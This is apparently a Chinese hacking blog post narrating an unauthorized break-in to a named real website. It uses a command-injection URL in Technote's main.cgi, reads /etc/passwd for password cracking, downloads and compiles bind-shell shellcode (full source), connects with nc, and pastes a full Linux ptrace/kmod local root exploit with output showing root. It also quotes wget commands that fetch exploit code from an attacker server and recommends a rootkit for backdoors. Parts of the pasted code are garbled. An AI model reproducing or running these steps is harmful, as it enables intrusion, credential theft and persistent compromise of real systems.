| 关键词: nbsp shell 漏洞 include 如图 shellcode push 程序 输入 nobody |
作者:cnbird 大家好,我是cnbird,我又回来了,好长时间没有写文章了,今天手痒痒, 所以就写了一篇,希望对与unix的初学者有帮助.欢迎大家和我讨论技术。MainpAge:http://cnbird.hackvip.cn 最近在家研究perl和UNIX服务器的安装和应用,所以很长时间没有进行渗 透了,在学perl和UNIX的话就要傻了,什么也不会了,所以去各大黑客站点 转转吧,来到了www.nsfocus.net看看吧,有没有什么新的公告啊,Technote 'main.cgi'远程任意命令执行漏洞 这个漏洞引起了我的注意,大致看了看, 知道了这是一个可以远程执行命令的漏洞,下面把漏洞的信息公布一下,Technote是韩国的Technote公司开发的公告牌系统。 Technote的'main.cgi'没有充分过滤用户提交输入,远程攻击者可以利用这 个漏洞以WEB进程权限在系统上执行任意命令。 由于不正确过滤'filename'参数,攻击者提交包含"|command"的数据作为参 数内容,可能以WEB进程权限在系统上执行任意命令。 给出利用方法 http://[target]/cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id| 看了看利用方法觉得很简单,所以打算自己写一个perl的漏洞利用程序, 看了半天,终于完成了,自己perl新学的原因,所以写的比较简陋,还要自己 修改路径,很麻烦,我就不公布了,省的高手见笑。其实这个漏洞成功率还是 很高的,基本上90%以上吧,对于咱们这些经常搞安全的应该说是一个好消息. ^_^. 好了开始咱们这次难得的入侵之旅吧,这篇文章看着很简单,其实融合我多年 的经验(其实就1-2年),首先要测试这个漏洞,先要找这样的论坛, google.com就是方便,一下子找到了一大堆,好了随便挑一个进行测试吧,哈哈哈就拿你开口吧。 http://www.sealia.com/cgi-bin/technote/main.cgi首先大致看了看,然后就开始吧, 按照绿盟给出的公告测试一下,输入http://www.sealia.com/cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id| 结果如图1 大家看到结果了 uid=99(nobody) gid=99(nobody) groups=99(nobody)下面就开始利用我自己写的程序来完成工作了,毕竟在IE里面输太麻烦了,我程序的工作界面。如图2 依次输入IP和端口,就可以直接运行程序了,输入id呵呵,和IE里面基本上差 不多, 如图3 呵呵到这里我想大家的思路就是上传一个webshell然后在webshell里面搞了, 其实我也有这样的想法,可是我已经习惯了UNIX的命令行模式了,虽然能写一个webshell,但是我并没有这样做,我的目的是拿到root权限,大家一定问了,你连主机都没有连上呢,你怎么拿到root啊,小伙子你问的不错,奖你个梨吃,呵呵,下面我的思路就是登陆到机器上面,上面大家已经看到了,我们id命令的输出是uid=99(nobody) gid=99(nobody) groups=99(nobody),权限还是很低的,试试能不能拿到/etc/passwd然后跑密码,然后执行[www.sealia.com]$ cat /etc/passwd 不错,能拿到/etc/passwd。 如图4 呵呵已经得到/etc/passwd了,我们用流光去跑密码吧,当然我没有指望它能跑出来,等待的时间真漫长啊,无聊,都已经5点50分了,天天晚上,哦哦不是晚上了,是早晨这个时候睡觉,然后12点起来,天天如此,哎,,苦啊。。。 去forum.zone-h.org看看帖子吧,也许能找到什么灵感呢!无意间来到了http://forum.zone-h.org/viewtopic.php?t=1168&highlight=phpbb他们正在讨论phpbb的漏洞利用方法和代码,看看吧,虽然已经很老很老了,呵呵其实说实话,不怕各位见小,我以前问在这里问过问题,很长时间没有来了,看看他们有没有给回复啊 如图5 呵呵见笑了,真没想到他们给的答案还很全面,^_^连什么程序都给出了,老外就是实在...呵呵... This one works fine http://rst.void.ru/download/r57phpbb2010.txt upload, someth like this ./exploit.pl victimhost:port /php_root/ topic_num "wget -O /var/tmp/.r.c http://myhttpserver:port/exploit/root.c" ./exploit.pl victimhost:port /php_root/ topic_num "gcc /var/tmp/.r.c -o .root" exec on victim hots same shit and binding shell http://shellcode.org/Shellcode/Linux/shell-bind-shell.html 回答的让我很满意啊,正好就试试他们给的方法吧,其实以前我也知道这样的方法的就是没有binding shell(就是把/bin/sh绑定到端口上)。好了说了这么多离题的话,我们还是赶紧做我们的事吧. 首先来到了http://shellcode.org/Shellcode/Linux/shell-bind-shell.html看了看, This piece of code will open a socket for listening upon port 20000 and spawn a shell for all incoming connections. This would be ideal for a system which you didn't have a direct login shell upon. 从描述上来看是linux的binding shell,并且绑定到了20000端口,下面有该程序的下载地方,真方便啊,http://shellcode.org/Shellcode/Linux/shell-bind-shell.c 给出代码 /* 92 bytes iscntrl() evading portbinding shellcode - linux-x86 * - by bighawk ([email protected]) * * This shellcode binds a shell on port 20000 * * stdin, stdout and stderr are dupped. accept() arguments are sane. */ char code[] = "\x31\xdb" // xor ebx, ebx "\xf7\xe3" // mul ebx "\xb0\x66" // mov al, 102 "\x53" // push ebx "\x43" // inc ebx "\x53" // push ebx "\x43" // inc ebx "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\x4b" // dec ebx "\xcd\x80" // int 80h "\x89\xc7" // mov edi, eax "\x52" // push edx "\x66\x68\x4e\x20" // push word 8270 "\x43" // inc ebx "\x66\x53" // push bx "\x89\xe1" // mov ecx, esp "\xb0\xef" // mov al, 239 "\xf6\xd0" // not al "\x50" // push eax "\x51" // push ecx "\x57" // push edi "\x89\xe1" // mov ecx, esp "\xb0\x66" // mov al, 102 "\xcd\x80" // int 80h "\xb0\x66" // mov al, 102 "\x43" // inc ebx "\x43" // inc ebx "\xcd\x80" // int 80h "\x50" // push eax "\x50" // push eax "\x57" // push edi "\x89\xe1" // mov ecx, esp "\x43" // inc ebx "\xb0\x66" // mov al, 102 "\xcd\x80" // int 80h "\x89\xd9" // mov ecx, ebx "\x89\xc3" // mov ebx, eax "\xb0\x3f" // mov al, 63 "\x49" // dec ecx "\xcd\x80" // int 80h "\x41" // inc ecx "\xe2\xf8" // loop lp "\x51" // push ecx "\x68\x6e\x2f\x73\x68" // push dword 68732f6eh "\x68\x2f\x2f\x62\x69" // push dword 69622f2fh "\x89\xe3" // mov ebx, esp "\x51" // push ecx "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\xb0\xf4" // mov al, 244 "\xf6\xd0" // not al "\xcd\x80"; // int 80h main() { void (*a)() = (void *)code; int i; printf("size: %d bytes\n", strlen(code)); printf("Testing for cntrl characters.. "); for(i=0;i if(iscntrl(code[i])) printf("FAILED\n"), exit(255); printf("PASSED\n"); a();} 好了我们已经知道该下载地址 http://shellcode.org/Shellcode/Linux/shell-bind-shell.c了,就可以用wget这个命令来下载了,输入 wget http://shellcode.org/Shellcode/Linux/shell-bind-shell.c -P /tmp意思就是下载这个shell.c到/tmp目录下,如图6 然后ls /tmp得到下面的结果,[www.sealia.com]$ ls /tmpDate: Sat, 29 Jan 2005 22:17:14 GMTServer: Apache/1.3.29 (Unix) mod_throttle/3.1.2 PHP/4.3.8 PHP/3.0.18Set-Cookie: sealiakleadata1=|||1|; expires=Sunday, 31-Dec-01 23:59:59 GMT;Set-Cookie: koX8iT3Dda=-kleadata1-;Transfer-Encoding: chunkedContent-Type: text/plain2bdlost+foundmremap_pte.cmysql.sockptrace.csess_0a3d59b6da83717a4c05fbc5c6429982sess_12981c19e4cdab7bc426af965e7c85desess_33c246570a69e0846eaaedaef61f0402sess_4eb43cb41a450e8a7d15998fe4e9ef82sess_5c2048e3188733f41bba9a1ab44a4f3bsess_6405a9b3e0a809d7f298ad598f5de180sess_67fc6892112d2d780a092664353dcbbasess_9e3a2581194c05f598543f10294a95edsess_a0332a716e5c0a0932331ce9a5ec64d2sess_a159ec1f21a671d5cfe201c384d8da1csess_c6f579b218f096eb5ba11fdbad90f248sess_cdea344ed2940c99c1fcc146c5322882sess_f1e8e705bb1a6c5197ab61a22442da90shell-bind-shell.cshell-bind-shell.c.1ssh-XX0CyKEcssh-XX7eRJNnssh-XX89utqmssh-XXEmor9Xssh-XXhC36Gwssh-XXpOcVIAssh-XXrhx8enssh-XXss6aKsssh-XXw2rzSs这个时候就说明已经成功了,现在我们查找一下gcc在哪里,别到时候闹了半天在没有gcc就麻烦了,然后输入whereis -b gcc意思就是查找gcc的全路径输出结果[www.sealia.com]$ whereis -b gccDate: Sat, 29 Jan 2005 22:21:06 GMTServer: Apache/1.3.29 (Unix) mod_throttle/3.1.2 PHP/4.3.8 PHP/3.0.18Set-Cookie: sealiakleadata1=|||1|; expires=Sunday, 31-Dec-01 23:59:59 GMT;Set-Cookie: koX8iT3Dda=-kleadata1-;Transfer-Encoding: chunkedContent-Type: text/plain12gcc: /usr/bin/gcc好了找到gcc了,接下来的事就好办了,编译源程序gcc shell-bind-shell.c -o bind编译成功在/tmp目录下多了一个我们编译的bind程序,下面我们就来执行它吧,/tmp/bind程序执行的很慢哦.....大概等了1-2分钟程序执行完成,根据程序的介绍我们知道他开了20000端口,我们telnet 上去吧,telnet www.sealia.com 20000哈哈连接上了这个时候摸瞎输入id;uname -a 我晕怎么出现"command not found"呢,我晕了,没错啊,看看源程序吧,找到了最后,哈哈知道了原因,Note: To use this you will need to make sure that you append '\n\0' to your entered strings, otherwise you will receive errors saying "command not found".The following is a simple means of doing that: perl -e '$|++;while (<>) { print . "\n\x00"; }' | nc hostname 20000(nc is netcat).好了知道为什么了,我们就换nc提交吧,执行nc -vv www.sealia.com 20000然后出现了C:\WINDOWS\system32>nc -vv www.sealia.com 20000Warning: inverse host lookup failed for 61.100.181.12: h_errno 11004: NO_DATAwww.sealia.com [61.100.181.12] 20000 (?) open在黑暗中输入id输出结果uid=99(nobody) gid=99(nobody) groups=99(nobody)如图7 呵呵到这里我们可爱的流光还在跑呢,跑了将近半个小时了,不等了,关闭它,太浪费资源了,这个时候我大概知道他是一个linux的操作系统,但不知道内核版本输入uname -r 可以看到这个linux的内核iduid=99(nobody) gid=99(nobody) groups=99(nobody)uname -r2.4.20-31.92.4.20的,下面咱们来提升权限吧,就是拿到root,这里说明一下这里有2个很好用的漏洞利用程序,一个是Linux Kernel do_mremap VMA本地权限提升漏洞(漏洞利用程序下载地址http://rhea.oamk.fi/~pyanil00/temp/mremap_pte.c)和Linux kernel 2.2.x - 2.4.x ptrace/kmod local root exploit好了都准备好了,咱们开始提升权限吧,大家先把咱们要利用的程序输入到linux里面cd /tmp;cat >1.c然后复制代码右键输入代码/** Linux kernel ptrace/kmod local root exploit** This code exploits a race condition in kernel/kmod.c, which creates* kernel thread in insecure manner. This bug allows to ptrace cloned* process, allowing to take control over privileged modprobe binary.** Should work under all current 2.2.x and 2.4.x kernels.* * I discovered this stupid bug independently on January 25, 2003, that * is (almost) two month before it was fixed and published by Red Hat* and others.* * Wojciech Purczynski <[email protected]>** THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY** IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY* * (c) 2003 Copyright by iSEC Security Research*/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include char cliphcode[] ="\x90\x90\xeb\x1f\xb8\xb6\x00\x00""\x00\x5b\x31\xc9\x89\xca\xcd\x80""\xb8\x0f\x00\x00\x00\xb9\xed\x0d""\x00\x00\xcd\x80\x89\xd0\x89\xd3""\x40\xcd\x80\xe8\xdc\xff\xff\xff"; #define CODE_SIZE (sizeof(cliphcode) - 1) pid_t parent = 1;pid_t child = 1;pid_t victim = 1;volatile int gotchild = 0; void fatal(char * msg){perror(msg);kill(parent, SIGKILL);kill(child, SIGKILL);kill(victim, SIGKILL);} void putcode(unsigned long * dst){char buf[MAXPATHLEN + CODE_SIZE];unsigned long * src;int i, len; memcpy(buf, cliphcode, CODE_SIZE);len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1);if (len == -1)fatal("[-] Unable to read /proc/self/exe"); len += CODE_SIZE + 1;buf[len] = '\0'; src = (unsigned long*) buf;for (i = 0; i < len; i += 4)if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1)fatal("[-] Unable to write shellcode");} void sigchld(int signo){struct user_regs_struct regs; if (gotchild++ == 0)return; fprintf(stderr, "[+] Signal caught\n"); if (ptrace(PTRACE_GETREGS, victim, NULL, 畇) == -1)fatal("[-] Unable to read registers"); fprintf(stderr, "[+] Shellcode placed at 0x%08lx\n", regs.eip); putcode((unsigned long *)regs.eip); fprintf(stderr, "[+] Now wait for suid shell...\n"); if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1)fatal("[-] Unable to detach from victim"); exit(0);} void sigalrm(int signo){errno = ECANCELED;fatal("[-] Fatal error");} void do_child(void){int err; child = getpid();victim = child + 1; signal(SIGCHLD, sigchld); doerr = ptrace(PTRACE_ATTACH, victim, 0, 0);while (err == -1 && errno == ESRCH); if (err == -1)fatal("[-] Unable to attach"); fprintf(stderr, "[+] Attached to %d\n", victim);while (!gotchild) ;if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1)fatal("[-] Unable to setup syscall trace");fprintf(stderr, "[+] Waiting for signal\n"); for(;;);} void do_parent(char * progname){struct stat st;int err;errno = 0;socket(AF_SECURITY, SOCK_STREAM, 1);do {err = stat(progname, &st);} while (err == 0 && (st.st_mode & S_ISUID) != S_ISUID); if (err == -1)fatal("[-] Unable to stat myself"); alarm(0);system(progname);} void prepare(void){if (geteuid() == 0) {initgroups("root", 0);setgid(0);setuid(0);execl(_PATH_BSHELL, _PATH_BSHELL, NULL);fatal("[-] Unable to spawn shell");}} int main(int argc, char ** argv){prepare();signal(SIGALRM, sigalrm);alarm(10); parent = getpid();child = fork();victim = child + 1; if (child == -1)fatal("[-] Unable to fork"); if (child == 0)do_child();elsedo_parent(argv[0]); return 0;}CRTL+C保存,然后编译gcc 1.c -o 1编译成功,然后输入./1程序开始执行了,-> Parent's PID is 2313. Child's PID is 2314.-> Attaching to 2315...-> Got the thread!!-> Waiting for the next signal...-> Injecting shellcode at 0x4000e85d-> Bind root shell on port 24876... =p-> Detached from modprobe thread.-> Committing suicide..... iduid=0(root) gid=0(root) groups=0(root)哈哈到这个时候我们已经是root了,剩下的工作就是安装后门了,大家可以参考我另外的一篇文章,more.asp?name=cnbird&id=522还有推荐一个不错的rootkitpacketstormsecurity.org/UNIX/penetration/rootkits/lrk5.src.tar.gz好了到这里所有的工作就算已经完成了,其实从入侵中我们可以看出来我们做网站的一定要重视web漏洞,这一点点的小漏洞就可以把能拿到系统的最高权限,可见其危害性,希望国内的网管能够重视起来. |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|